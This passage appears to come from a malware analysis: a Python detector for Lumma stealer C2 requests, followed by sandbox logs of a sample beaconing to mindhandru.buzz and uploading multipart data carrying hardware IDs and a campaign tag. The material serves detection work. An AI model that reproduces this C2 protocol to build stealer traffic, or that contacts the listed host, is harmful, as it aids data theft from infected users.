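    return method, path, headers, body


def chunk_header(body: bytes, pos: int = 0):
    """Parse the chunk-size line starting at pos; return (size, offset of the chunk data)."""
    end = body.index(b"\r\n", pos)
    size_field = body[pos:end].split(b";")[0]  # drop any chunk extensions
    return int(size_field, 16), end + 2


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a complete chunked body; a trailer section after the last chunk is ignored."""
    out = bytearray()
    pos = 0
    while True:
        size, pos = chunk_header(body, pos)
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # step over the chunk data and its trailing CRLF


def classify_lumma_c2(method: str, path: str, headers: dict, body: bytes):
    """Return a verdict dict when the request matches the /api pattern seen in the report, else None."""
    if method != "POST" or path != "/api":
        return None
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    fields = parse_qs(body.decode("ascii", errors="replace"), keep_blank_values=True)
    act = fields.get("act", [""])[0]
    if act == "life":
        return {"stage": "beacon", "act": act, "host": headers.get("host", "")}
    if act == "recive_message":  # spelling exactly as observed on the wire
        return {
            "stage": "message_fetch",
            "act": act,
            "host": headers.get("host", ""),
            "ver": fields.get("ver", [""])[0],
            "lid": fields.get("lid", [""])[0],
            "j": fields.get("j", [""])[0],
        }
    return None


def analyse_beacon():
    """Run the session 0 exchange end to end and return what a detector would record."""
    method, path, headers, body = split_request(BEACON_REQUEST)
    return {
        "verdict": classify_lumma_c2(method, path, headers, body),
        "reply": decode_chunked(BEACON_RESPONSE_BODY),
        "head_len": len(BEACON_REQUEST) - len(body),  # 262, matching the report's OUT row
    }


if __name__ == "__main__":
    print(analyse_beacon())
    method, path, headers, _ = split_request(BEACON_REQUEST)
    print(classify_lumma_c2(method, path, headers, FETCH_BODY))
    print("first chunk of the fetch reply:", hex(chunk_header(FETCH_RESPONSE_PREFIX)[0]), "bytes")
```

The check keys on the request shape the report actually shows (POST /api, form body, act=life or act=recive_message with ver, lid and j) rather than on the Host header, because the domain rotates while the protocol does not; the Chrome/119 User-Agent is kept in the sample but deliberately not matched on, since it is indistinguishable from a real browser.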


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | 7380 | C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:52:47 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: mindhandru.buzz
2024-12-27 07:52:47 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-27 07:52:48 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=316khfvtahro8dajcoo5klplrb; expires=Tue, 22 Apr 2025 01:39:27 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XA2pQlfPdsWRqJMf9r1LOihTS0Ti0d0d3iuRuGvs2Quw796PGjdpTy6d8%2B6yW3%2Fj99k%2FnTf7bWQFQac%2BoCqapLKdccrNC6TlbMAEQczQM0CCl6fTRkvlwqZuMAUC3AE1s2k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bbb3fdb442d5-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1621&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1667618&cwnd=221&unsent_bytes=0&cid=12fad0f9f9530f27&ts=778&x=0"
2024-12-27 07:52:48 UTC | 244 | IN | Data Raw: 32 34 61 63 0d 0a 6a 6e 7a 50 38 78 36 4c 55 33 74 70 75 4e 42 35 75 76 4a 33 64 4f 4d 77 4e 31 71 49 47 2f 2f 4e 6c 51 42 69 77 43 59 4a 72 4b 37 31 58 72 6e 52 4a 4c 39 2f 57 52 72 64 38 6b 50 4f 67 41 49 52 7a 78 4a 57 50 71 6f 68 6d 61 7a 35 63 77 66 73 42 48 2f 42 6a 4c 51 61 72 70 39 74 37 6e 39 5a 44 4d 44 79 51 2b 47 4a 56 52 47 4e 45 67 31 34 37 58 47 64 72 50 6c 69 41 36 74 4a 65 63 44 4e 35 68 43 6f 6d 33 76 6f 4e 78 6f 46 31 62 55 63 33 35 4d 64 47 6f 70 64 58 7a 65 71 4e 39 32 6f 37 79 4a 59 34 6d 74 73 32 4d 2f 44 48 62 79 59 50 50 5a 2f 41 45 76 64 76 6c 75 41 30 42 59 52 67 56 78 52 50 75 4e 7a 6c 36 58 78 59 77 61 71 56 6d 44 4b 78 75 59 65 71 35 70 78 34 53 4d 58 44 39 4b 2b 47 74 57 54 56 56 6a 42 56 55
                                                                                              Data Ascii: 24acjnzP8x6LU3tpuNB5uvJ3dOMwN1qIG//NlQBiwCYJrK71XrnRJL9/WRrd8kPOgAIRzxJWPqohmaz5cwfsBH/BjLQarp9t7n9ZDMDyQ+GJVRGNEg147XGdrPliA6tJecDN5hCom3voNxoF1bUc35MdGopdXzeqN92o7yJY4mts2M/DHbyYPPZ/AEvdvluA0BYRgVxRPuNzl6XxYwaqVmDKxuYeq5px4SMXD9K+GtWTVVjBVU
2024-12-27 07:52:48 UTC | 1369 | IN | Data Raw: 31 34 73 6a 6e 4f 6e 66 52 7a 45 62 64 4a 65 38 69 4d 38 31 43 30 30 58 76 6c 63 55 46 4c 30 72 34 56 33 5a 4d 61 45 59 42 53 52 7a 66 71 65 70 57 6e 38 32 67 50 72 55 74 6c 78 4d 76 6b 46 36 71 65 65 2b 45 33 46 67 69 61 2f 46 76 66 69 46 56 4f 77 58 4a 46 4f 2b 6c 74 6b 4c 36 33 66 55 36 37 42 47 7a 43 6a 4c 52 65 71 35 39 39 35 44 45 4c 41 39 47 35 48 73 71 62 48 42 75 4d 55 6c 67 79 35 58 71 64 71 50 31 6f 44 36 68 41 5a 73 50 4b 37 42 37 74 33 7a 7a 75 4b 56 6c 54 6d 70 45 65 79 4a 63 5a 41 4d 4e 6f 46 53 65 6b 59 4e 32 6f 2b 79 4a 59 34 6b 78 75 7a 63 2f 6e 45 61 36 5a 64 2f 73 78 43 77 33 58 74 77 6e 65 6c 52 73 63 67 6b 42 66 4e 75 78 36 6c 4b 54 2b 5a 77 65 6d 42 43 57 4f 79 2f 52 65 39 64 46 64 35 44 6f 56 41 63 32 79 57 38 66 65 44 46 61 47 58
                                                                                              Data Ascii: 14sjnOnfRzEbdJe8iM81C00XvlcUFL0r4V3ZMaEYBSRzfqepWn82gPrUtlxMvkF6qee+E3Fgia/FvfiFVOwXJFO+ltkL63fU67BGzCjLReq5995DELA9G5HsqbHBuMUlgy5XqdqP1oD6hAZsPK7B7t3zzuKVlTmpEeyJcZAMNoFSekYN2o+yJY4kxuzc/nEa6Zd/sxCw3XtwnelRscgkBfNux6lKT+ZwemBCWOy/Re9dFd5DoVAc2yW8feDFaGX
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 32 6b 4b 4f 33 4c 45 43 6c 58 43 75 57 6a 4d 59 64 75 5a 4a 32 71 77 51 61 42 64 53 31 44 5a 69 50 57 77 2f 42 56 56 6c 34 73 6a 6d 51 72 76 39 6b 45 71 31 4a 61 4d 44 43 34 78 75 69 6d 58 7a 70 50 42 77 50 30 62 6b 59 31 5a 51 48 48 49 46 61 55 44 6e 67 63 39 33 68 74 32 55 59 34 68 77 72 2f 39 76 6e 58 4a 69 53 63 75 63 32 44 30 76 46 2f 41 4b 59 6c 78 6c 57 32 52 4a 59 4d 4f 39 38 6b 71 37 39 62 41 57 6f 53 47 50 41 7a 2f 34 52 71 5a 46 77 34 54 73 55 42 64 36 36 45 74 4f 62 45 78 61 41 57 42 56 32 71 6e 36 46 37 36 38 69 4e 4b 56 49 5a 73 47 4f 32 52 32 6a 6e 33 76 2f 63 51 5a 46 77 2f 49 63 31 4e 42 4e 56 6f 31 62 56 54 50 67 66 5a 32 6f 2b 6d 63 44 70 55 64 6d 79 63 62 69 47 61 6d 64 64 65 51 33 47 51 7a 65 74 77 6e 64 6d 52 6b 61 77 52 77 56 50 2f
                                                                                              Data Ascii: 2kKO3LEClXCuWjMYduZJ2qwQaBdS1DZiPWw/BVVl4sjmQrv9kEq1JaMDC4xuimXzpPBwP0bkY1ZQHHIFaUDngc93ht2UY4hwr/9vnXJiScuc2D0vF/AKYlxlW2RJYMO98kq79bAWoSGPAz/4RqZFw4TsUBd66EtObExaAWBV2qn6F768iNKVIZsGO2R2jn3v/cQZFw/Ic1NBNVo1bVTPgfZ2o+mcDpUdmycbiGamddeQ3GQzetwndmRkawRwVP/
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 74 32 55 4d 34 68 77 72 78 38 58 2b 45 4b 4f 59 63 65 38 35 48 67 58 58 75 52 33 54 6c 78 49 51 6a 46 70 59 50 65 6c 34 6d 61 58 6c 59 51 75 6f 53 57 47 4f 67 71 77 5a 74 64 45 6b 71 52 59 56 49 73 71 70 43 63 37 51 43 6c 69 59 45 6c 49 30 71 69 48 64 72 50 68 72 44 36 70 4d 5a 4d 48 49 34 68 69 72 6e 48 6e 6d 4f 77 73 44 31 4c 38 51 31 35 73 48 46 6f 78 57 57 54 7a 69 63 70 66 76 75 53 49 48 75 67 51 7a 6a 76 6e 68 45 61 32 53 61 71 6b 75 56 78 4b 61 74 52 65 59 79 46 55 61 6a 31 4a 61 4e 4f 5a 79 6c 61 37 37 62 41 65 6e 54 57 50 47 33 75 30 61 70 5a 42 79 35 6a 41 64 44 74 2b 32 48 4e 79 57 47 6c 62 50 45 6c 49 67 71 69 48 64 67 4e 42 58 51 6f 4e 2b 4b 39 47 43 39 56 36 71 6e 54 79 78 63 52 55 49 31 72 6f 55 33 70 6b 5a 48 49 68 5a 57 54 50 75 64 5a 53
                                                                                              Data Ascii: t2UM4hwrx8X+EKOYce85HgXXuR3TlxIQjFpYPel4maXlYQuoSWGOgqwZtdEkqRYVIsqpCc7QCliYElI0qiHdrPhrD6pMZMHI4hirnHnmOwsD1L8Q15sHFoxWWTzicpfvuSIHugQzjvnhEa2SaqkuVxKatReYyFUaj1JaNOZyla77bAenTWPG3u0apZBy5jAdDt+2HNyWGlbPElIgqiHdgNBXQoN+K9GC9V6qnTyxcRUI1roU3pkZHIhZWTPudZS
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 61 4e 43 65 63 6e 46 2f 68 43 67 6e 6e 54 68 4f 42 67 50 33 37 38 64 31 4a 6f 55 45 59 39 63 58 58 69 6b 4f 5a 71 33 74 7a 70 41 67 31 52 77 33 4e 72 68 50 36 43 65 50 50 5a 2f 41 45 76 64 76 6c 75 41 30 42 77 45 68 56 39 48 4d 65 31 33 6b 71 7a 6c 59 77 32 70 56 6d 7a 42 79 4f 73 53 71 35 35 36 36 44 51 54 42 39 32 33 45 4e 65 63 56 56 6a 42 56 55 31 34 73 6a 6d 7a 70 4f 52 31 41 36 78 50 66 64 57 4d 38 31 43 30 30 58 76 6c 63 55 46 4c 32 62 6b 51 33 4a 41 5a 46 6f 56 66 56 53 72 6c 66 70 71 6d 2f 48 41 4b 70 55 4e 67 78 73 66 6a 47 4c 2b 64 63 76 73 30 43 78 6d 61 2f 46 76 66 69 46 56 4f 77 57 52 53 4b 50 70 36 33 35 37 68 59 52 61 70 53 57 65 4f 30 36 49 48 37 5a 5a 77 71 57 6c 5a 44 64 57 37 47 4e 65 52 48 42 71 4d 56 31 77 39 36 33 2b 5a 70 66 31 69
                                                                                              Data Ascii: aNCecnF/hCgnnThOBgP378d1JoUEY9cXXikOZq3tzpAg1Rw3NrhP6CePPZ/AEvdvluA0BwEhV9HMe13kqzlYw2pVmzByOsSq5566DQTB923ENecVVjBVU14sjmzpOR1A6xPfdWM81C00XvlcUFL2bkQ3JAZFoVfVSrlfpqm/HAKpUNgxsfjGL+dcvs0Cxma/FvfiFVOwWRSKPp6357hYRapSWeO06IH7ZZwqWlZDdW7GNeRHBqMV1w963+Zpf1i
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 53 41 31 61 77 5a 6f 64 45 6b 71 54 49 65 43 4e 75 34 45 74 53 66 45 68 4b 54 57 46 49 71 36 33 69 57 6f 76 74 69 44 61 39 4f 61 73 66 42 34 42 4f 71 6c 6e 50 73 63 56 64 4c 33 61 70 62 67 4e 41 30 47 34 70 65 44 6d 4b 71 5a 74 4f 32 74 32 55 4d 34 68 77 72 7a 73 62 70 46 4b 43 53 63 2b 6f 6a 47 41 33 49 73 68 62 53 67 68 38 64 68 46 39 59 4e 65 6c 2f 6d 36 54 37 63 41 6d 69 52 32 43 4f 67 71 77 5a 74 64 45 6b 71 52 49 4f 48 64 43 31 46 38 36 62 46 42 57 58 58 30 56 34 70 44 6d 4d 71 4f 59 69 57 4c 52 55 66 4d 6e 54 6f 67 66 74 6c 6e 43 70 61 56 6b 4e 30 37 51 63 33 70 34 48 45 34 64 64 57 6a 48 6a 66 5a 57 73 39 32 59 45 70 55 46 6f 77 73 66 72 48 61 4b 56 64 65 63 34 46 6b 75 55 38 68 7a 41 30 45 31 57 6f 45 6c 57 4e 4f 63 35 67 75 48 75 49 67 65 75 42
                                                                                              Data Ascii: SA1awZodEkqTIeCNu4EtSfEhKTWFIq63iWovtiDa9OasfB4BOqlnPscVdL3apbgNA0G4peDmKqZtO2t2UM4hwrzsbpFKCSc+ojGA3IshbSgh8dhF9YNel/m6T7cAmiR2COgqwZtdEkqRIOHdC1F86bFBWXX0V4pDmMqOYiWLRUfMnTogftlnCpaVkN07Qc3p4HE4ddWjHjfZWs92YEpUFowsfrHaKVdec4FkuU8hzA0E1WoElWNOc5guHuIgeuB
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 30 58 6f 32 61 61 75 77 32 44 30 6e 76 73 52 58 57 6c 77 4e 57 6e 6d 30 62 65 4f 56 6a 33 66 66 4f 65 30 43 6c 53 43 75 57 6a 50 6b 5a 72 5a 5a 6d 2f 7a 59 56 47 74 47 2f 46 2f 71 66 45 67 43 43 58 56 59 70 34 7a 57 57 6f 72 63 73 51 4b 56 63 4b 35 61 4d 77 78 6d 37 6b 6c 50 71 49 42 42 4c 6c 50 49 63 7a 74 42 4e 56 72 38 53 52 7a 76 36 65 70 4b 2b 79 53 4a 59 75 33 6f 72 78 64 72 72 44 71 36 48 64 2b 51 39 43 44 57 61 36 6b 2b 4b 77 6b 64 45 30 30 30 56 4a 39 55 33 33 61 36 33 4f 6a 6d 37 42 48 32 4f 6c 4c 35 51 37 59 4d 38 73 58 46 65 43 4d 69 67 48 64 75 47 46 6c 47 2f 62 48 49 75 34 48 36 4e 71 4f 42 74 51 4f 77 45 5a 49 36 55 31 56 36 6b 6c 6d 66 34 4a 78 51 62 33 66 49 6b 6c 74 41 4e 56 74 6b 53 59 44 76 6b 64 35 71 35 35 69 38 6e 74 45 35 73 33 73
                                                                                              Data Ascii: 0Xo2aauw2D0nvsRXWlwNWnm0beOVj3ffOe0ClSCuWjPkZrZZm/zYVGtG/F/qfEgCCXVYp4zWWorcsQKVcK5aMwxm7klPqIBBLlPIcztBNVr8SRzv6epK+ySJYu3orxdrrDq6Hd+Q9CDWa6k+KwkdE000VJ9U33a63Ojm7BH2OlL5Q7YM8sXFeCMigHduGFlG/bHIu4H6NqOBtQOwEZI6U1V6klmf4JxQb3fIkltANVtkSYDvkd5q55i8ntE5s3s
                                                                                              2024-12-27 07:52:48 UTC938INData Raw: 6e 6a 44 6e 4f 68 6b 4d 79 71 51 41 6c 4a 67 57 44 4a 74 73 61 78 50 6d 66 35 71 31 38 47 51 6d 67 67 51 6c 6a 73 4f 73 52 70 54 52 4e 4b 6b 4f 56 30 76 43 38 6b 4f 59 70 52 59 59 6a 31 56 44 4b 61 64 52 76 70 58 4e 49 43 79 6c 55 53 6e 36 79 2f 77 50 70 70 78 77 71 58 39 5a 44 5a 72 71 53 35 62 51 45 51 66 42 43 67 56 71 73 53 7a 4f 2b 4b 63 77 48 2b 78 64 4b 39 69 4d 74 45 7a 6a 30 57 36 70 61 56 6c 4d 32 61 41 4a 33 70 4d 44 46 63 5a 73 61 78 2f 6b 66 70 79 35 35 33 55 50 6e 48 70 2b 7a 63 4c 69 47 62 75 41 50 4b 64 78 46 6b 75 43 69 31 75 51 30 43 70 59 77 55 6f 56 59 4b 70 4d 6e 71 48 35 5a 52 61 7a 43 55 7a 41 79 2b 30 49 76 59 5a 7a 71 58 39 5a 44 5a 72 71 53 5a 62 51 45 51 66 42 43 67 56 71 73 53 7a 4f 2b 4b 63 77 48 2b 78 64 4b 39 69 4d 74 45 7a
                                                                                              Data Ascii: njDnOhkMyqQAlJgWDJtsaxPmf5q18GQmggQljsOsRpTRNKkOV0vC8kOYpRYYj1VDKadRvpXNICylUSn6y/wPppxwqX9ZDZrqS5bQEQfBCgVqsSzO+KcwH+xdK9iMtEzj0W6paVlM2aAJ3pMDFcZsax/kfpy553UPnHp+zcLiGbuAPKdxFkuCi1uQ0CpYwUoVYKpMnqH5ZRazCUzAy+0IvYZzqX9ZDZrqSZbQEQfBCgVqsSzO+KcwH+xdK9iMtEz
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 32 34 37 30 0d 0a 58 76 58 52 4f 2b 6f 6a 43 77 33 5a 70 42 69 66 72 69 73 77 67 6c 56 54 4f 2b 52 75 6a 4f 33 59 59 51 75 75 53 47 7a 59 38 74 49 4c 72 70 39 79 37 69 63 49 53 35 54 79 46 4a 6a 49 4c 46 61 51 57 46 4a 30 6f 6a 57 4d 76 50 6c 70 46 71 55 45 56 49 43 4d 39 46 37 31 30 55 6e 71 50 78 63 4d 7a 4b 4e 57 2f 70 4d 53 45 49 4a 63 51 69 6d 71 4e 39 32 70 74 7a 70 53 37 41 52 76 33 34 79 30 54 76 2f 4b 4b 62 70 6d 53 56 6e 46 2f 41 4b 59 68 6c 56 4f 30 68 77 56 4b 71 6f 68 33 65 6a 35 62 77 47 68 53 6d 6a 63 33 75 6f 64 75 35 49 37 31 77 38 38 42 74 65 33 46 64 2b 75 4b 7a 65 4c 51 6c 67 33 37 55 65 6a 6d 4f 5a 6c 45 4f 42 69 61 4e 6a 50 72 46 44 74 69 54 79 78 63 54 67 42 79 72 38 55 33 39 42 62 56 6f 55 53 44 58 6a 50 64 4a 43 71 2b 57 56 43 67
                                                                                              Data Ascii: 2470XvXRO+ojCw3ZpBifriswglVTO+RujO3YYQuuSGzY8tILrp9y7icIS5TyFJjILFaQWFJ0ojWMvPlpFqUEVICM9F710UnqPxcMzKNW/pMSEIJcQimqN92ptzpS7ARv34y0Tv/KKbpmSVnF/AKYhlVO0hwVKqoh3ej5bwGhSmjc3uodu5I71w88Bte3Fd+uKzeLQlg37UejmOZlEOBiaNjPrFDtiTyxcTgByr8U39BbVoUSDXjPdJCq+WVCg


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49703 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 7380 | Process: C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:52:50 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Y8OKL05051W3WH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12826
Host: mindhandru.buzz
2024-12-27 07:52:50 UTC | 12826 | OUT | Data Raw: 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 38 4f 4b 4c 30 35 30 35 31 57 33 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 38
Data Ascii: --Y8OKL05051W3WHContent-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--Y8OKL05051W3WHContent-Disposition: form-data; name="pid"2--Y8OKL05051W3WHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--Y8
2024-12-27 07:52:51 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:52:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ripduno08ivlruh1oeqf5000h3; expires=Tue, 22 Apr 2025 01:39:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVf9W20HRS%2BoQaIJngGcL4h9%2F6fJpOE8EcCFFbsAXyJysI%2BKCzG3ZHrtLVnSPbgG25WzYjjqg7Hdv8BmZhbIHQ3JrOIC5uA8Esa7Cfu4nOMqQxH%2BgBzUy1yrB75ZgR5OMPw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87bbc2fb7c4244-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1779&rtt_var=670&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13761&delivery_rate=1628555&cwnd=221&unsent_bytes=0&cid=688fc66d2cb66f40&ts=1047&x=0"
2024-12-27 07:52:51 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:52:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 7380 | Process: C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:52:52 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DTLPDGVYJ7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15034
Host: mindhandru.buzz
2024-12-27 07:52:52 UTC | 15034 | OUT | Data Raw: 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 54 4c 50 44 47 56 59 4a 37 0d 0a 43 6f
Data Ascii: --DTLPDGVYJ7Content-Disposition: form-data; name="hwid"91B76BBA1422A8ACBEBA0C6A975F1733--DTLPDGVYJ7Content-Disposition: form-data; name="pid"2--DTLPDGVYJ7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DTLPDGVYJ7Co
2024-12-27 07:52:59 UTC | 1132 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:52:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bnjrnf5q1mt5e0dtaer0pbd5ph; expires=Tue, 22 Apr 2025 01:39:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etiK9x4JKmMfvd5oLC8VP8ecgLhYumu3mm3IkkAPbSx%2FLGH5ksTPgiC%2BS9UU6p1S5DwflqBdQ5DRITHbjN8kS15clh3IR%2Bf6kOqGiQxuLjUlZXx70O%2BWmSW%2FSwavA5Zp3A0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87bbd27ba87ca2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1824&rtt_var=719&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15965&delivery_rate=1486761&cwnd=239&unsent_bytes=0&cid=7de0a82e11f6e4a1&ts=7264&x=0"
2024-12-27 07:52:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:52:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49733 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 7380 | Process: C:\Users\user\Desktop\ARoqFi68Nr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:53:01 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=EGAS4F6GYU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20359
Host: mindhandru.buzz
2024-12-27 07:53:01 UTC | 15331 | OUT | Data Raw: 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 37 36 42 42 41 31 34 32 32 41 38 41 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 47 41 53 34 46 36 47 59 